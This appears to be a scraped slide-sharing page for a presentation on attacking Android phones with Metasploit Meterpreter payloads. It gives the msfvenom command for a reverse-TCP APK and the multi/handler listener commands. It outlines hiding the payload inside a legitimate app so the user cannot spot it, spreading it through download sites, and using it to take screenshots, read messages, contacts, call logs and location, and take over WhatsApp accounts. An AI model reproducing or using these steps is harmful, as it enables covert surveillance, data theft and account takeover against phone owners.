ºÝºÝߣ

ºÝºÝߣShare a Scribd company logo

Hack beachpresetation

•Download as PPTX, PDF•
•
Y
Yadev Jayachandran

This document discusses using Meterpreter payloads in Metasploit to attack Android devices. It explains how to generate a Meterpreter payload using msfvenom, merge it with a legitimate app, install the payload on a target device, and use features like taking screenshots, retrieving messages and contacts to potentially take down a WhatsApp account. The document outlines setting up a listener with Metasploit to receive data from the payload after it has been installed on the target device.

1 of 13
Download to read offline
MSF Meterpreter Payload Attacks Yadev Jayachandran InnovaDen yadev64@gmail.com
OUTLINE OF PRESENTATION • Payloads • Meterpreter • Loosing WhatsApp accounts 2
METASPLOIT • Metasploit Project - computer security project - security vulnerabilities - penetration testing • METASPLOIT FRAMEWORK(MSF) - sub project - a tool for developing and executing exploit code 3
PAYLOAD A payload in metapsloit refers to an exploit module. There are three different types of payload modules in the Metasploit Framework: Singles, Stagers, and Stages. These different types allow for a great deal of versatility and can be useful across numerous types of scenarios. 4
METERPRETER • Meta-Interpreter • dynamically extensible payload • in-memory DLL injection stager • resides completely in the memory of the remote host • leaves no traces on the hard drive 5
GENERATING METERPRETER PAYLOAD IN MSF msfvenom -p android/meterpreter/reverse_tcp LHOST=IP_Address LPORT=Incoming_Port -o meterpreter.apk o Can be Encoded o Platform independent 6
MERGING PAYLOADWITH REAL APP • Decompile • Copy the payload files • Inject the hook • Recompile • Sign 7
GETTING PAYLOAD INSTALLED INTARGET DEVICE • simply share the payload embedded app • uploading the apk into external download sites ATTACKER Target Device Cloud Storage 8
FEATURES • Take a snap shot • Retrieve messages • Retrieve contacts • Retrieve Call logs • Locate the target • And lots more…. Target Device ATTACKERS PC WITH MSF 9
ATTACKINGTHETARGET Generate a listener : use multi/handler msf exploit(handler) > set payload android/meterpreter/reverse_tcp PAYLOAD => android/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.1.13 LHOST => 192.168.1.13 msf exploit(handler) > exploit 10
TAKING DOWNWhatsApp ACCOUNT ATTACKER WhatsApp Server TARGET DEVICE ATTACKERS PC WITH MSF 11
Thank You. 12
Hack beachpresetation

More Related Content

Hack beachpresetation

Editor's Notes

  • #4: MSF is open source. Its available for linux and windows. But, the most popular way of using it is through the use of KALI Linux. Kali got all other tools which is needed for further attacks. MSF comes pre-installed on Kali.
  • #6: The stager is what's sent to the target device. This makes it hard for AV programs to detect it. The stage will be further downloaded and run by the stager in the starger device.
  • #7: This is a payload autogenerate command for the MSF. By this, even the beginners could generate a payload.
  • #8: After these steps, the payload is injected to the app such that the user can’t identify it.
  • #11: The above commands sets up the listener which could communicate with the payload.